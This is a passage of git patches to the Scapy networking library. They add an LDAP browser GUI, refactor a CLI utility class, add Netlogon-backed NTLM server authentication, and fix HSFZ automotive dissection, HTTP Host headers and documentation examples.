command=popup.cancel).grid(row=3, column=1) + + basednf.focus() + + # Setup + if popup.run(): + # Cancelled + return + + # Get values + basedn = basednv.get() + flt = filterv.get() + scope = scopev.get() + + self.lastSearchString = flt + + # Perform search + self.tprint("Searching...", flush=True) + try: + results = self.client.search( + baseObject=basedn, + scope=scope, + filter=flt, + ) + except ValueError as ex: + self.tprint(str(ex)) + return + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + self.tprint("Getting %s entries..." % len(results)) + for item in results: + self._showsearchresult(item, results) + + def modifydn(self, *args): + """ + Modify the DN of an item + """ + # Get selected item + try: + selection = self.tk_tree.selection()[0] + except IndexError: + selection = "" + + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # Duplicate UI + dlg.grid_columnconfigure(1, weight=1) + + basednv = tk.StringVar() + basednv.set(selection) + ttk.Label(dlg, text="DN:").grid(row=0, column=0, sticky="w") + basednf = tk.Entry(dlg, textvariable=basednv) + basednf.grid(row=0, column=1, sticky="we") + + newdnv = tk.StringVar() + ttk.Label(dlg, text="New DN:").grid(row=1, column=0, sticky="w") + newdnf = tk.Entry(dlg, textvariable=newdnv) + newdnf.grid(row=1, column=1, sticky="we") + + ttk.Button(dlg, text="OK", command=popup.dismiss).grid(row=2, column=0) + ttk.Button(dlg, text="Cancel", command=popup.cancel).grid(row=2, column=1) + + if selection: + newdnf.focus() + else: + basednf.focus() + + # Setup + if popup.run(): + # Cancelled + return + + # Get values + basedn = basednv.get() + newdn = newdnv.get() + + self.tprint("Changing %s to %s..." % (basedn, newdn)) + try: + self.client.modifydn( + entry=basedn, + newdn=newdn, + ) + except ValueError as ex: + self.tprint(str(ex)) + return + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + self.tprint("OK !") + + def new(self, mode): + """ + New popup. Called by both 'Add child' and 'Duplicate' popups + """ + if mode == "duplicate": + # Get selected item + try: + selection = self.tk_tree.selection()[0] + except IndexError: + selection = "" + else: + selection = "" + + existing_attributes = {} + if selection: + # Perform search to retrieve the attributes + self.tprint("Getting attributes for %s..." % selection, flush=True) + try: + results = self.client.search( + baseObject=selection, + scope=0, + ) + if selection not in results: + raise ValueError("Bad result") + existing_attributes = results[selection] + except ValueError as ex: + self.tprint(str(ex)) + return + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + # Show edit popup to be able to change an attribute + results = self._edit_popup(selection, mode="new", editattrs=existing_attributes) + if not results: + return + newdn, changes = results + + # Extract all the 'add' attributes operations from changes + attributes = {attr: val for (_, attr, val) in changes} + + self.tprint("Adding %s..." % newdn) + try: + self.client.add( + newdn, + attributes=attributes, + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + self.tprint("OK !") + + def duplicate(self, *args): + return self.new("duplicate") + + def addchild(self, *args): + return self.new("addchild") + + def _format_attribute(self, name, value, crop=False): + """ + Format a LDAP attribute + """ + if isinstance(value, list): + # It's a list. + return ";".join(self._format_attribute(name, v, crop=crop) for v in value) + elif name == "objectSid": + return WINNT_SID(value).summary() + elif isinstance(value, bytes): + # Catch-all for bytes values + value = value.hex() + else: + # Catch-all + value = str(value) + # If cropping is enabled and requested, crop + if crop and self.crop_output.get() and len(value) >= 80: + return value[:80] + "... (%so)" % len(value) + return value + + def _parse_attribute(self, name, value): + """ + Parse a formatted attribute + """ + parsed = [] + # Split across ; + for val in value.split(";"): + if name == "objectSid": + val = WINNT_SID.fromstr(val) + parsed.append(val) + return parsed + + def tprint(self, x, tags=[], flush=False): + """ + Print to text pane + """ + self.tk_textpane.configure(state=tk.NORMAL) + self.tk_textpane.insert("end", x + "\n", tuple(tags)) + self.tk_textpane.configure(state=tk.DISABLED) + self.tk_textpane.see(tk.END) + if flush: + self.root.update() + + def main(self): + """ + Main loop: start the GUI. + """ + # Note: for TK doc, use https://tkdocs.com + + # Root + self.root = tk.Tk() + self.root.title("LDAPhero (@secdev/scapy)") + self.root.option_add("*tearOff", False) + + # TTK style + + ttkstyle = ttk.Style() + ttkstyle.theme_use("alt") + ttkstyle.configure( + "BorderFrame.TFrame", + relief="groove", + borderwidth=3, + ) + + # Global configuration variables + self.crop_output = tk.BooleanVar() + self.crop_output.set(True) + + # Create main frames, pack them in scrollable elements + content = ttk.PanedWindow(self.root, orient=tk.HORIZONTAL) + + tvfr = ttk.Frame(content) + tvfr.grid_columnconfigure(0, weight=1) + tvfr.grid_rowconfigure(0, weight=1) + self.tk_tree = ttk.Treeview(tvfr, show="tree") + content.add(tvfr) + self.tk_tree.bind("", self.treedoubleclick) + + tree_scrollbar = AutoHideScrollbar( + tvfr, orient="vertical", command=self.tk_tree.yview + ) + self.tk_tree.configure(yscrollcommand=tree_scrollbar.set) + self.tk_tree.grid(row=0, column=0, sticky="nsew") + self.tk_tree.column("#0", width=200) + + self.tk_textpane = tk.Text(content, state=tk.DISABLED) + self.tk_textpane.tag_configure("bold", font="TkCaptionFont") + self.tk_textpane.tag_configure("error", foreground="red") + content.add(self.tk_textpane) + + # Menu + menubar = tk.Menu(self.root) + self.menu_connection = tk.Menu(menubar) + self.menu_browse = tk.Menu(menubar) + self.menu_view = tk.Menu(menubar) + menubar.add_cascade(menu=self.menu_connection, label="Connection") + self.menu_connection.add_command(label="Connect", command=self.connect) + self.menu_connection.add_command( + label="Bind", command=self.bind, state=tk.DISABLED, accelerator="Ctrl+B" + ) + self.menu_connection.add_command( + label="Disconnect", command=self.disconnect, state=tk.DISABLED + ) + self.menu_connection.add_command(label="Quit", command=self.root.destroy) + menubar.add_cascade(menu=self.menu_browse, label="Browse") + self.menu_browse.add_command( + label="Add child", + command=self.addchild, + state=tk.DISABLED, + accelerator="Ctrl+A", + ) + self.menu_browse.add_command( + label="Modify", command=self.edit, state=tk.DISABLED, accelerator="Ctrl+M" + ) + self.menu_browse.add_command( + label="Modify DN", + command=self.modifydn, + state=tk.DISABLED, + accelerator="Ctrl+R", + ) + self.menu_browse.add_command( + label="Search", command=self.search, state=tk.DISABLED, accelerator="Ctrl+S" + ) + menubar.add_cascade(menu=self.menu_view, label="View") + self.menu_view.add_command( + label="Tree", command=self.tree, state=tk.DISABLED, accelerator="Ctrl+T" + ) + self.menu_view.add_checkbutton( + label="Crop output", onvalue=True, offvalue=False, variable=self.crop_output + ) + self.root["menu"] = menubar + + # Right-click menu + self.popup = tk.Menu(self.root, tearoff=0) + self.popup.add_command( + label="Search", command=self.search, accelerator="Ctrl+S" + ) + self.popup.add_command(label="Modify", command=self.edit, accelerator="Ctrl+M") + self.popup.add_command( + label="Modify DN", command=self.modifydn, accelerator="Ctrl+R" + ) + self.popup.add_command(label="Duplicate", command=self.duplicate) + popup_adv = tk.Menu(self.popup) + self.popup.add_cascade(label="Advanced", menu=popup_adv) + popup_adv.add_command(label="Security descriptor", command=self.viewsec) + popup_adv.add_command(label="Member Of", command=self.editmemberof) + + def do_popup(event): + item = self.tk_tree.identify_row(event.y) + if item: + if self.tk_tree.tag_has("unclickable", item): + # Unclickable + return + self.tk_tree.selection_set(item) + self.popup.tk_popup(event.x_root, event.y_root) + + self.tk_tree.bind("", do_popup) + + # Shortcuts + self.root.bind_all("", self.bind) + self.root.bind_all("", self.tree) + + # Initial rendering + content.pack(fill="both", expand=True) + self.root.update() + + # Try connecting + if self.host is not None: + self.root.after(0, self.connect) + + # Main loop + self.root.mainloop() diff --git a/tox.ini b/tox.ini index d5dafd033b9..62639d16d3f 100644 --- a/tox.ini +++ b/tox.ini @@ -111,6 +111,8 @@ commands = python .config/mypy/mypy_check.py linux [testenv:docs] description = "Build the docs" deps = cryptography + sphinx + sphinx_rtd_theme extras = doc changedir = {toxinidir}/doc/scapy commands = From 0e36b18fdc42498df8e27920ab8c20fd4212b6f3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 10 Jun 2025 19:20:10 +0200 Subject: [PATCH 1490/1632] Fix CLIUtil overlap (#4769) --- scapy/utils.py | 50 +++++++++++++++++++++++++++++++++++++++++---- test/regression.uts | 31 ++++++++++++++++++++++++++++ 2 files changed, 77 insertions(+), 4 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index c9d673c9244..f7ecf6d447c 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -19,6 +19,7 @@ import collections import decimal import difflib +import enum import gzip import inspect import locale @@ -3566,7 +3567,38 @@ def whois(ip_address): #################### -class CLIUtil: +class _CLIUtilMetaclass(type): + class TYPE(enum.Enum): + COMMAND = 0 + OUTPUT = 1 + COMPLETE = 2 + + def __new__(cls, # type: Type[_CLIUtilMetaclass] + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[CLIUtil] + dct["commands"] = { + x.__name__: x + for x in dct.values() + if getattr(x, "cliutil_type", None) == _CLIUtilMetaclass.TYPE.COMMAND + } + dct["commands_output"] = { + x.cliutil_ref.__name__: x + for x in dct.values() + if getattr(x, "cliutil_type", None) == _CLIUtilMetaclass.TYPE.OUTPUT + } + dct["commands_complete"] = { + x.cliutil_ref.__name__: x + for x in dct.values() + if getattr(x, "cliutil_type", None) == _CLIUtilMetaclass.TYPE.COMPLETE + } + newcls = cast(Type['CLIUtil'], type.__new__(cls, name, bases, dct)) + return newcls + + +class CLIUtil(metaclass=_CLIUtilMetaclass): """ Provides a Util class to easily create simple CLI tools in Scapy, that can still be used as an API. @@ -3594,6 +3626,14 @@ def _depcheck(self) -> None: # provides completion to command commands_complete: Dict[str, Callable[..., List[str]]] = {} + def __init__(self, cli: bool = True, debug: bool = False) -> None: + """ + DEV: overwrite + """ + if cli: + self._depcheck() + self.loop(debug=debug) + @staticmethod def _inspectkwargs(func: DecoratorCallable) -> None: """ @@ -3655,7 +3695,7 @@ def addcommand( Decorator to register a command """ def func(cmd: DecoratorCallable) -> DecoratorCallable: - cls.commands[cmd.__name__] = cmd + cmd.cliutil_type = _CLIUtilMetaclass.TYPE.COMMAND # type: ignore cmd._spaces = spaces # type: ignore cmd._globsupport = globsupport # type: ignore cls._inspectkwargs(cmd) @@ -3670,7 +3710,8 @@ def addoutput(cls, cmd: DecoratorCallable) -> Callable[[DecoratorCallable], Deco Decorator to register a command output processor """ def func(processor: DecoratorCallable) -> DecoratorCallable: - cls.commands_output[cmd.__name__] = processor + processor.cliutil_type = _CLIUtilMetaclass.TYPE.OUTPUT # type: ignore + processor.cliutil_ref = cmd # type: ignore cls._inspectkwargs(processor) return processor return func @@ -3681,7 +3722,8 @@ def addcomplete(cls, cmd: DecoratorCallable) -> Callable[[DecoratorCallable], De Decorator to register a command completor """ def func(processor: DecoratorCallable) -> DecoratorCallable: - cls.commands_complete[cmd.__name__] = processor + processor.cliutil_type = _CLIUtilMetaclass.TYPE.COMPLETE # type: ignore + processor.cliutil_ref = cmd # type: ignore return processor return func diff --git a/test/regression.uts b/test/regression.uts index 2dfae7dd044..6ff43dae945 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4937,3 +4937,34 @@ def _test_fragleak(func, sr1, select, L3socket): assert _test_fragleak(fragleak) assert _test_fragleak(fragleak2) + ++ CLIUtil +~ cliutil + += CLIUtil: define and check overlap + +from scapy.layers.smbclient import smbclient + +class CLI1(CLIUtil): + @CLIUtil.addcommand() + def shares(self): + return 1 + @CLIUtil.addoutput(shares) + def shares_output(self, results): + print(results) + + +class CLI2(CLIUtil): + @CLIUtil.addcommand() + def shares(self): + return 2 + @CLIUtil.addoutput(shares) + def shares_output(self, results): + print(results) + + +c1 = CLI1(cli=False) +c2 = CLI2(cli=False) + +assert c1.shares() == 1 +assert c2.shares() == 2 From 8870fbaf2688c9bdf21963cd8efa5259e44a564e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 11 Jun 2025 03:33:52 +0200 Subject: [PATCH 1491/1632] Publish NTLMSSP_DOMAIN (#4766) --- doc/scapy/layers/smb.rst | 8 ++ scapy/layers/msrpce/msnrpc.py | 19 +++- scapy/layers/ntlm.py | 202 ++++++++++++++++++++++++++++++++-- scapy/layers/smbclient.py | 1 + 4 files changed, 219 insertions(+), 11 deletions(-) diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 16261c69792..20482142246 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -246,6 +246,14 @@ A share is identified by a ``name`` and a ``path`` (+ an optional description ca ) ) +**Start a SMB server with NTLM auth in an AD, using machine credentials:** + +.. note:: This requires an active account with ``WORKSTATION_TRUST_ACCOUNT`` in its ``userAccountControl``. (otherwise you might get ``STATUS_NO_TRUST_SAM_ACCOUNT``) + +.. code:: python + + smbserver(ssp=NTLMSSP_DOMAIN(UPN="Computer1@domain.local", HASHNT=bytes.fromhex("7facdc498ed1680c4fd1448319a8c04f"))) + **Start a SMB server with Kerberos auth:** .. code:: python diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index 493c8918265..a07cb42aa9b 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -563,7 +563,7 @@ class NetlogonClient(DCERPC_Client): >>> cli = NetlogonClient() >>> cli.connect_and_bind("192.168.0.100") - >>> cli.establishSecureChannel( + >>> cli.establish_secure_channel( ... domainname="DOMAIN", computername="WIN10", ... HashNT=bytes.fromhex("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"), ... ) @@ -571,7 +571,8 @@ class NetlogonClient(DCERPC_Client): def __init__( self, - auth_level=DCE_C_AUTHN_LEVEL.NONE, + # Default to PRIVACY: see KB5021130 + auth_level=DCE_C_AUTHN_LEVEL.PKT_PRIVACY, verb=True, supportAES=True, **kwargs, @@ -645,7 +646,7 @@ def validate_authenticator(self, auth): if tempcred != auth.Credential.data: raise ValueError("Server netlogon authenticator is wrong !") - def establishSecureChannel( + def establish_secure_channel( self, computername: str, domainname: str, @@ -669,6 +670,7 @@ def establishSecureChannel( # Flow documented in 3.1.4 Session-Key Negotiation # and sect 3.4.5.2 for specific calls clientChall = os.urandom(8) + # Step 1: NetrServerReqChallenge netr_server_req_chall_response = self.sr1_req( NetrServerReqChallenge_Request( @@ -693,6 +695,7 @@ def establishSecureChannel( ) netr_server_req_chall_response.show() raise ValueError + # Calc NegotiateFlags NegotiateFlags = FlagValue( 0x602FFFFF, # sensible default (Windows) @@ -700,6 +703,7 @@ def establishSecureChannel( ) if self.supportAES: NegotiateFlags += "AES" + # We are either using NetrServerAuthenticate3 or NetrServerAuthenticateKerberos if mode == NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3: # We use the legacy NetrServerAuthenticate3 function (NetlogonSSP) @@ -735,6 +739,7 @@ def establishSecureChannel( NetrServerAuthenticate3_Response not in netr_server_auth3_response or netr_server_auth3_response.status != 0 ): + # An error occurred. NegotiatedFlags = None if NetrServerAuthenticate3_Response in netr_server_auth3_response: NegotiatedFlags = FlagValue( @@ -748,14 +753,19 @@ def establishSecureChannel( % (NegotiatedFlags ^ NegotiateFlags) ) ) + + # Show the error print( conf.color_theme.fail( "! %s" % STATUS_ERREF.get(netr_server_auth3_response.status, "Failure") ) ) + + # If error is unknown, show the packet entirely if netr_server_auth3_response.status not in STATUS_ERREF: netr_server_auth3_response.show() + raise ValueError # Check Server Credential if self.supportAES: @@ -772,8 +782,10 @@ def establishSecureChannel( ): print(conf.color_theme.fail("! Invalid ServerCredential.")) raise ValueError + # SessionKey negotiated ! self.SessionKey = SessionKey + # Create the NetlogonSSP and assign it to the local client self.ssp = self.sock.session.ssp = NetlogonSSP( SessionKey=self.SessionKey, @@ -785,5 +797,6 @@ def establishSecureChannel( NegotiateFlags += "Kerberos" # TODO raise NotImplementedError + # Finally alter context (to use the SSP) self.alter_context() diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index c27d0566b95..b4141eb540e 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1180,8 +1180,8 @@ class NTLMSSP(SSP): Server-only arguments: - :param DOMAIN_NB_NAME: the domain Netbios name (default: DOMAIN) - :param DOMAIN_FQDN: the domain FQDN (default: .local) + :param DOMAIN_FQDN: the domain FQDN (default: domain.local) + :param DOMAIN_NB_NAME: the domain Netbios name (default: strip DOMAIN_FQDN) :param COMPUTER_NB_NAME: the server Netbios name (default: SRV) :param COMPUTER_FQDN: the server FQDN (default: .) @@ -1248,9 +1248,9 @@ def __init__( PASSWORD=None, USE_MIC=True, NTLM_VALUES={}, - DOMAIN_NB_NAME="DOMAIN", DOMAIN_FQDN=None, - COMPUTER_NB_NAME="SRV", + DOMAIN_NB_NAME=None, + COMPUTER_NB_NAME=None, COMPUTER_FQDN=None, IDENTITIES=None, DO_NOT_CHECK_LOGIN=False, @@ -1263,9 +1263,22 @@ def __init__( self.HASHNT = HASHNT self.USE_MIC = USE_MIC self.NTLM_VALUES = NTLM_VALUES - self.DOMAIN_NB_NAME = DOMAIN_NB_NAME - self.DOMAIN_FQDN = DOMAIN_FQDN or (self.DOMAIN_NB_NAME.lower() + ".local") - self.COMPUTER_NB_NAME = COMPUTER_NB_NAME + if UPN is not None: + from scapy.layers.kerberos import _parse_upn + + try: + user, realm = _parse_upn(UPN) + if DOMAIN_FQDN is None: + DOMAIN_FQDN = realm + if COMPUTER_NB_NAME is None: + COMPUTER_NB_NAME = user + except ValueError: + pass + self.DOMAIN_FQDN = DOMAIN_FQDN or "domain.local" + self.DOMAIN_NB_NAME = ( + DOMAIN_NB_NAME or self.DOMAIN_FQDN.split(".")[0].upper()[:15] + ) + self.COMPUTER_NB_NAME = COMPUTER_NB_NAME or "SRV" self.COMPUTER_FQDN = COMPUTER_FQDN or ( self.COMPUTER_NB_NAME.lower() + "." + self.DOMAIN_FQDN ) @@ -1843,7 +1856,8 @@ def _getSessionBaseKey(self, Context, auth_tok): return NTLMv2_ComputeSessionBaseKey( ResponseKeyNT, auth_tok.NtChallengeResponse.NTProofStr ) - log_runtime.debug("NTLMSSP: Bad credentials for %s" % username) + elif self.IDENTITIES: + log_runtime.debug("NTLMSSP: Bad credentials for %s" % username) return None def _checkLogin(self, Context, auth_tok): @@ -1872,3 +1886,175 @@ def _checkLogin(self, Context, auth_tok): if NTProofStr == auth_tok.NtChallengeResponse.NTProofStr: return True return False + + +class NTLMSSP_DOMAIN(NTLMSSP): + """ + A variant of the NTLMSSP to be used in server mode that gets the session + keys from the domain using a Netlogon channel. + + This has the same arguments as NTLMSSP, but supports the following in server + mode: + + :param UPN: the UPN of the machine account to login for Netlogon. + :param HASHNT: the HASHNT of the machine account to use for Netlogon. + :param PASSWORD: the PASSWORD of the machine acconut to use for Netlogon. + :param DC_IP: (optional) specify the IP of the DC. + + Examples:: + + >>> mySSP = NTLMSSP_DOMAIN( + ... UPN="Server1@domain.local", + ... HASHNT=bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c"), + ... ) + """ + + def __init__(self, UPN, *args, timeout=3, ssp=None, **kwargs): + from scapy.layers.kerberos import KerberosSSP + + # UPN is mandatory + kwargs["UPN"] = UPN + + # Either PASSWORD or HASHNT or ssp + if "HASHNT" not in kwargs and "PASSWORD" not in kwargs and ssp is None: + raise ValueError( + "Must specify either 'HASHNT', 'PASSWORD' or " + "provide a ssp=KerberosSSP()" + ) + elif ssp is not None and not isinstance(ssp, KerberosSSP): + raise ValueError("'ssp' can only be None or a KerberosSSP !") + + # Call parent + super(NTLMSSP_DOMAIN, self).__init__( + *args, + **kwargs, + ) + + # Treat specific parameters + self.DC_IP = kwargs.pop("DC_IP", None) + if self.DC_IP is None: + # Get DC_IP from dclocator + from scapy.layers.ldap import dclocator + + self.DC_IP = dclocator( + self.DOMAIN_FQDN, + timeout=timeout, + debug=kwargs.get("debug", 0), + ).ip + + # If logging in via Kerberos + self.ssp = ssp + + def _getSessionBaseKey(self, Context, ntlm): + """ + Return the Session Key by asking the DC. + """ + # No user / no domain: skip. + if not ntlm.UserNameLen or not ntlm.DomainNameLen: + return super(NTLMSSP_DOMAIN, self)._getSessionBaseKey(Context, ntlm) + + # Import RPC stuff + from scapy.layers.dcerpc import NDRUnion + from scapy.layers.msrpce.msnrpc import ( + NetlogonClient, + NETLOGON_SECURE_CHANNEL_METHOD, + ) + from scapy.layers.msrpce.raw.ms_nrpc import ( + NetrLogonSamLogonWithFlags_Request, + PNETLOGON_NETWORK_INFO, + PNETLOGON_AUTHENTICATOR, + NETLOGON_LOGON_IDENTITY_INFO, + RPC_UNICODE_STRING, + STRING, + ) + + # Create NetlogonClient with PRIVACY + client = NetlogonClient() + client.connect_and_bind(self.DC_IP) + + # Establish the Netlogon secure channel (this will bind) + try: + if self.ssp is None: + # Login via classic NetlogonSSP + client.establish_secure_channel( + mode=NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3, + computername=self.COMPUTER_NB_NAME, + domainname=self.DOMAIN_NB_NAME, + HashNt=self.HASHNT, + ) + else: + # Login via KerberosSSP (Windows 2025) + # TODO + client.establish_secure_channel( + mode=NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticateKerberos, + ) + except ValueError: + log_runtime.warning( + "Couldn't establish the Netlogon secure channel. " + "Check the credentials for '%s' !" % self.COMPUTER_NB_NAME + ) + return super(NTLMSSP_DOMAIN, self)._getSessionBaseKey(Context, ntlm) + + # Request validation of the NTLM request + req = NetrLogonSamLogonWithFlags_Request( + LogonServer="", + ComputerName=self.COMPUTER_NB_NAME, + Authenticator=client.create_authenticator(), + ReturnAuthenticator=PNETLOGON_AUTHENTICATOR(), + LogonLevel=6, # NetlogonNetworkTransitiveInformation + LogonInformation=NDRUnion( + tag=6, + value=PNETLOGON_NETWORK_INFO( + Identity=NETLOGON_LOGON_IDENTITY_INFO( + LogonDomainName=RPC_UNICODE_STRING( + Buffer=ntlm.DomainName, + ), + ParameterControl=0x00002AE0, + UserName=RPC_UNICODE_STRING( + Buffer=ntlm.UserName, + ), + Workstation=RPC_UNICODE_STRING( + Buffer=ntlm.Workstation, + ), + ), + LmChallenge=Context.chall_tok.ServerChallenge, + NtChallengeResponse=STRING( + Buffer=bytes(ntlm.NtChallengeResponse), + ), + LmChallengeResponse=STRING( + Buffer=bytes(ntlm.LmChallengeResponse), + ), + ), + ), + ValidationLevel=6, + ExtraFlags=0, + ndr64=client.ndr64, + ) + + # Get response + resp = client.sr1_req(req) + if resp and resp.status == 0: + # Success + + # Validate DC authenticator + client.validate_authenticator(resp.ReturnAuthenticator.value) + + # Get and return the SessionKey + UserSessionKey = resp.ValidationInformation.value.value.UserSessionKey + return bytes(UserSessionKey) + else: + # Failed + from scapy.layers.smb2 import STATUS_ERREF + + print( + conf.color_theme.fail( + "! %s" % STATUS_ERREF.get(resp.status, "Failure !") + ) + ) + if resp.status not in STATUS_ERREF: + resp.show() + return super(NTLMSSP_DOMAIN, self)._getSessionBaseKey(Context, ntlm) + + def _checkLogin(self, Context, auth_tok): + # Always OK if we got the session key + return True diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index adf7b093fdb..c5eece14f05 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1227,6 +1227,7 @@ def __init__( ssp=ssp, debug=debug, REQUIRE_ENCRYPTION=REQUIRE_ENCRYPTION, + timeout=timeout, **kwargs, ) try: From 71c4d883b5773475769596f32b866fc319f3eb2d Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sun, 15 Jun 2025 06:38:40 +0200 Subject: [PATCH 1492/1632] hsfz: Improve alive check dissection. (#4760) --- scapy/contrib/automotive/bmw/hsfz.py | 15 +++++++++++++-- test/contrib/automotive/bmw/hsfz.uts | 14 +++++++++++++- 2 files changed, 26 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index d3269e39d5f..8eb49f7a1e1 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -65,12 +65,23 @@ class HSFZ(Packet): ConditionalField( StrFixedLenField("identification_string", None, None, lambda p: p.length), - lambda p: p.control == 0x11 and p.length != 0) + lambda p: p._hasidstring()) ] def _hasaddrs(self): # type: () -> bool - return self.control == 0x01 or self.control == 0x02 + # Address present in diagnostic_req_res, acknowledge_transfer and + # two byte length alive_check frames. + return self.control == 0x01 or \ + self.control == 0x02 or \ + (self.control == 0x12 and self.length == 2) + + def _hasidstring(self): + # type: () -> bool + # ID string is present in some vehicle_ident_data frames and in + # long alive_check grames. + return (self.control == 0x11 and self.length != 0) or \ + (self.control == 0x12 and self.length > 2) def hashret(self): # type: () -> bytes diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index 5bd92cabd89..479608babec 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -111,9 +111,21 @@ assert pkt.length == 0 assert pkt.control == 0x11 -= Test HSFZSocket += Dissect alive check +pkt = HSFZ(bytes.fromhex("000000200012444941474144523130424d5756494e5858585858585858585858585858585858")) +assert pkt.length == 32 +assert pkt.control == 0x12 +assert b"BMW" in pkt.identification_string + +pkt = HSFZ(bytes.fromhex("00000002001200f4")) +assert pkt.length == 2 +assert pkt.control == 0x12 +assert pkt.source == 0x00 +assert pkt.target == 0xf4 += Test HSFZSocket + server_up = threading.Event() def server(): buffer = bytes(HSFZ(control=1, source=0xf4, target=0x10) / Raw(b'\x11\x22\x33' * 1024)) From 163c4bc83f548244f9655346245007feb85be07d Mon Sep 17 00:00:00 2001 From: tryger Date: Wed, 18 Jun 2025 00:46:26 +0200 Subject: [PATCH 1493/1632] Append non-default port to Host header in HTTP_Client requests (#4772) --- scapy/layers/http.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 7642bdbf764..fede3e60594 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -885,7 +885,13 @@ def request( self._connect_or_reuse(host, port=port, tls=tls, timeout=timeout) # Build request - headers.setdefault("Host", host) + if ((tls and port != 443) or + (not tls and port != 80)): + host_hdr = "%s:%d" % (host, port) + else: + host_hdr = host + + headers.setdefault("Host", host_hdr) headers.setdefault("Path", path) if not http_headers: From 543d3f7f468928016d16244c1da6e277e7bf23be Mon Sep 17 00:00:00 2001 From: Isidro Date: Wed, 18 Jun 2025 00:47:49 +0200 Subject: [PATCH 1494/1632] [doc] Results.plot callback receive 2 args: (query,answer) (#4764) Fixes: ```python >>> a.plot(lambda x:x[1].id) File /home/isidro/ms/webserver/venv/lib/python3.13/site-packages/scapy/plist.py:288, in _PacketList.plot(self, f, lfilter, plot_xy, **kargs) 286 # Get the list of packets 287 if lfilter is None: --> 288 lst_pkts = [f(*e) for e in self.res] 289 else: 290 lst_pkts = [f(*e) for e in self.res if lfilter(*e)] TypeError: () takes 1 positional argument but 2 were given ``` --- doc/scapy/usage.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 0a5bb16da2b..f7e730e2d62 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1121,7 +1121,7 @@ We can easily plot some harvested values using Matplotlib. (Make sure that you h For example, we can observe the IP ID patterns to know how many distinct IP stacks are used behind a load balancer:: >>> a, b = sr(IP(dst="www.target.com")/TCP(sport=[RandShort()]*1000)) - >>> a.plot(lambda x:x[1].id) + >>> a.plot(lambda q,r: r.id) [] .. image:: graphics/ipid.png From 8acbd1b2b679b3e3e34f9ab598801b819c263395 Mon Sep 17 00:00:00 2001 From: Isidro Date: Wed, 18 Jun 2025 07:20:49 +0200 Subject: [PATCH 1495/1632] doc: unpack result to access TracerouteResult (#4763) Fixes: >>> a.world_trace() AttributeError: 'tuple' object has no attribute 'world_trace' --- doc/scapy/usage.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index f7e730e2d62..4cf9f4ec54b 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -559,7 +559,7 @@ In this example, we used the `traceroute_map()` function to print the graphic. T It could have been done differently: >>> conf.geoip_city = "path/to/GeoLite2-City.mmdb" - >>> a = traceroute(["www.google.co.uk", "www.secdev.org"], verbose=0) + >>> a, _ = traceroute(["www.google.co.uk", "www.secdev.org"], verbose=0) >>> a.world_trace() or such as above: From 6a2303403017d4bb4a8168e389388d9e42852050 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 25 Jun 2025 13:50:43 +0200 Subject: [PATCH 1496/1632] Tiny kerberos fixes (#4774) --- scapy/config.py | 2 ++ scapy/layers/kerberos.py | 4 ++-- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index a6a406fa979..a692a6d4efe 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1059,6 +1059,8 @@ class Conf(ConfClass): 'llmnr', 'lltd', 'mgcp', + 'msrpce.rpcclient', + 'msrpce.rpcserver', 'mobileip', 'netbios', 'netflow', diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 51fc17bbba5..5c6a0c687e1 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -4818,11 +4818,12 @@ def GSS_Accept_sec_context( 